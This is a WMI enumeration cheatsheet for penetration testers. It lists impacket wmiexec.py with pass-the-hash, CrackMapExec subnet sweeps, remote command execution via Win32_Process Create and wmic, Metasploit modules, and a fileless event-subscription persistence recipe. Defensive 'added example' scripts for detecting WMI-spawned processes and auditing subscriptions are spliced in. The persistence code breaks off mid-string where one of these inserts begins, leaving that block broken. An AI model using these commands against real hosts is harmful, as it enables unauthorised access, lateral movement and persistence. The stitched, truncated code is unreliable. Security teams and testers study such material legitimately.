WMI Enumeration Cheatsheet
Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)
What is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC.
Service Detection (port scan)
nmap -p 135 <ip>
nmap -p 135 -sV <ip>
nmap -p 135 --script msrpc-enum <ip>
impacket — wmiexec.py
# Interactive shell
python3 wmiexec.py <domain>/<user>:<pass>@<ip>
# Single command
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "whoami"
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "ipconfig /all"
# Pass-the-Hash
python3 wmiexec.py -hashes :<nthash> <domain>/<user>@<ip>
python3 wmiexec.py -hashes <lmhash>:<nthash> <domain>/<user>@<ip>
# Without domain (local account)
python3 wmiexec.py ./<user>:<pass>@<ip>
CrackMapExec
crackmapexec wmi <ip> -u <user> -p <pass>
crackmapexec wmi <ip> -u <user> -p <pass> -x 'whoami'
crackmapexec wmi <ip> -u <user> -H <nthash>
crackmapexec wmi 192.168.1.0/24 -u <user> -p <pass>
PowerShell WMI (Local & Remote)
# Local system queries
Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_Process
Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_Group
Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" }
Get-WmiObject -Class Win32_Product # Installed software (slow; also triggers an MSI consistency check on every package)
Get-WmiObject -Class Win32_LogicalDisk
Get-WmiObject -Class Win32_StartupCommand # Startup items
# Modern equivalent (CIM)
Get-CimInstance -ClassName Win32_OperatingSystem
Get-CimInstance -ClassName Win32_Process
# Remote queries
$cred = Get-Credential
Get-WmiObject -Class Win32_OperatingSystem -ComputerName <ip> -Credential $cred
Get-WmiObject -Class Win32_Process -ComputerName <ip> -Credential $cred
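The same remote queries over the CIM cmdlets, as an added example that is not part of the original cheatsheet. Get-WmiObject only exists in Windows PowerShell 5.1; Get-CimInstance works there and in PowerShell 7, and its session option decides which ports the traffic uses. The target placeholder and the credential prompt are assumptions.

```powershell
# Added example (not from the original cheatsheet): remote enumeration with a CIM session.
$target = '<ip>'            # placeholder for the remote host
$cred   = Get-Credential    # prompts for <domain>\<user>

# -Protocol Dcom keeps the traffic on TCP 135 plus dynamic high ports, exactly like
# Get-WmiObject. The default (WSMan) would instead need WinRM on TCP 5985/5986.
$opt     = New-CimSessionOption -Protocol Dcom
$session = New-CimSession -ComputerName $target -Credential $cred -SessionOption $opt -ErrorAction Stop

try {
    # Host identity
    Get-CimInstance -CimSession $session -ClassName Win32_OperatingSystem |
        Select-Object CSName, Caption, Version, BuildNumber, LastBootUpTime

    # Running services and the accounts they run as
    Get-CimInstance -CimSession $session -ClassName Win32_Service -Filter "State='Running'" |
        Select-Object Name, StartName, PathName | Format-Table -AutoSize

    # Process list with the parent PID, which is what WMI-spawned children are later matched on
    Get-CimInstance -CimSession $session -ClassName Win32_Process |
        Select-Object ProcessId, ParentProcessId, Name, CommandLine | Format-Table -AutoSize
}
finally {
    # Tear the DCOM session down; otherwise it lingers until the PowerShell process exits
    Remove-CimSession -CimSession $session
}
```

One session serves any number of queries, so the credential is sent once rather than per cmdlet as with the -Credential form above.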
PowerShell WMI Remote Code Execution
# Execute command via WMI (the new process is a child of WmiPrvSE.exe; the redirected output file stays on disk)
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create `
-ArgumentList "cmd.exe /c whoami > C:\output.txt" `
-ComputerName <ip> -Credential $cred
# Confirm the output file exists (CIM_DataFile returns file metadata, not contents; backslashes must be doubled in WQL)
Get-WmiObject -Class CIM_DataFile -Filter "Name='C:\\output.txt'" `
-ComputerName <ip> -Credential $cred
wmic (Legacy CLI — Windows)
:: Deprecated by Microsoft and may be absent on current Windows 11 builds; prefer the PowerShell CIM cmdlets
:: Local
wmic os get Caption,Version,BuildNumber
wmic process list brief
wmic useraccount list brief
wmic group list brief
wmic service where "State='Running'" list brief
:: Installed software (slow; "::" is only a comment at the start of a line, not inline)
wmic product get Name,Version
wmic startup list full
:: Remote
wmic /node:<ip> /user:<user> /password:<pass> os get Caption
wmic /node:<ip> /user:<user> /password:<pass> process call create "cmd.exe /c whoami > C:\out.txt"
wmic /node:<ip> /user:<user> /password:<pass> useraccount list brief
WQL Queries
# WQL = WMI Query Language (SQL-like)
Get-WmiObject -Query "SELECT * FROM Win32_Process WHERE Name='lsass.exe'"
Get-WmiObject -Query "SELECT * FROM Win32_Service WHERE StartMode='Auto' AND State='Stopped'"
Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE LocalAccount=True"
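WQL used from the defender's side, as an added example that is not part of the original cheatsheet. Every remote-execution path on this page (wmiexec.py, crackmapexec wmi -x, Invoke-WmiMethod Win32_Process Create, wmic process call create) ends in Win32_Process.Create, and the process it starts is a child of the WMI provider host WmiPrvSE.exe, so the parent link is the thing to query for. The function name and its optional CimSession parameter are my own; it runs against the local host by default.

```powershell
# Added example (not from the original cheatsheet): find processes started through WMI.
function Get-WmiSpawnedProcess {
    [CmdletBinding()]
    param([Microsoft.Management.Infrastructure.CimSession]$CimSession)   # optional, from a New-CimSession call

    $common = @{}
    if ($CimSession) { $common['CimSession'] = $CimSession }

    # WQL: the provider host processes that service incoming WMI calls
    $providerHosts = Get-CimInstance @common -Query "SELECT ProcessId FROM Win32_Process WHERE Name='WmiPrvSE.exe'"
    if (-not $providerHosts) { return }
    $hostIds = $providerHosts.ProcessId

    # WQL has no JOIN, so the parent match is done in PowerShell
    Get-CimInstance @common -Query "SELECT ProcessId,ParentProcessId,Name,CommandLine,CreationDate FROM Win32_Process" |
        Where-Object { $_.ParentProcessId -in $hostIds } |
        Select-Object ProcessId, ParentProcessId, Name, CreationDate, CommandLine
}

# Narrow to the shapes seen on this page: cmd.exe/powershell.exe children, or output
# redirected to the ADMIN$ share (wmiexec.py's default: cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1)
Get-WmiSpawnedProcess |
    Where-Object { $_.CommandLine -match 'ADMIN\$' -or $_.Name -in @('cmd.exe', 'powershell.exe') } |
    Format-Table -AutoSize
```

WmiPrvSE.exe also parents legitimate children (management agents, software deployment), so treat a hit as a lead and baseline the host. The same parent-child relation is available historically from Security event 4688 with parent-process logging enabled, or from Sysmon event 1, which is what a SIEM rule would consume instead of a live query.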
Metasploit
use exploit/windows/smb/psexec # SMB service-creation lateral movement, not WMI/DCOM; listed for comparison
use exploit/windows/local/wmi # Runs commands on remote hosts over WMI from an existing session (persistence module: exploit/windows/local/wmi_persistence)
use auxiliary/scanner/winrm/winrm_wql # WQL via WinRM
WMI Persistence (Post-Exploitation)
# Create permanent WMI event subscription (fileless persistence)
$filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
Name = "PentestFilter"
EventNameSpace = "root
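Auditing the other side of the persistence technique above, as an added example that is not from the original cheatsheet. A permanent subscription is three objects in root\subscription: an __EventFilter holding the WQL trigger, an __EventConsumer subclass holding the action, and a __FilterToConsumerBinding tying them together. A defender lists the bindings and resolves each to its filter and consumer, then checks the Windows logs that record their creation. The function name and output fields are assumptions; reading root\subscription fully needs local administrator rights.

```powershell
# Added example (not from the original cheatsheet): list permanent WMI event subscriptions.
function Get-WmiPersistence {
    [CmdletBinding()]
    param([string]$ComputerName)   # optional; omit to audit the local host without WinRM

    $cim = @{ Namespace = 'root\subscription' }
    if ($ComputerName) { $cim['ComputerName'] = $ComputerName }

    # The three pieces: filter (trigger), consumer (action), binding (link between them)
    $filters   = Get-CimInstance @cim -ClassName __EventFilter
    $consumers = Get-CimInstance @cim -ClassName __EventConsumer   # base class, so every consumer type is returned
    $bindings  = Get-CimInstance @cim -ClassName __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Filter/Consumer are object paths such as __EventFilter.Name="..."; pull the Name out of each
        $fName = $b.Filter   -replace '.*Name="([^"]*)".*', '$1'
        $cName = $b.Consumer -replace '.*Name="([^"]*)".*', '$1'
        $f = $filters   | Where-Object Name -eq $fName
        $c = $consumers | Where-Object Name -eq $cName

        [pscustomobject]@{
            Computer     = if ($ComputerName) { $ComputerName } else { $env:COMPUTERNAME }
            FilterName   = $fName
            Query        = $f.Query
            ConsumerName = $cName
            ConsumerType = $c.CimClass.CimClassName
            # CommandLineEventConsumer runs a command line; ActiveScriptEventConsumer runs VBScript/JScript
            Action       = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        }
    }
}

Get-WmiPersistence | Format-List

# Creation trail: WMI-Activity 5861 is written when a permanent consumer is registered;
# Sysmon, where deployed, logs 19/20/21 for filter, consumer and binding creation.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue | Select-Object TimeCreated, Message
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 19, 20, 21 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
```

Windows ships one stock binding (SCM Event Log Filter to SCM Event Log Consumer); any other entry needs a known owner, and a CommandLineEventConsumer or ActiveScriptEventConsumer bound to a logon, startup or timer filter is the pattern the technique above produces.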